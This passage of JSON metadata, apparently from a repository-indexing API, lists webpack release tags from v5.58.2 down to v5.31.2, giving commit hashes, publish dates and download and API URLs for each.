ag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job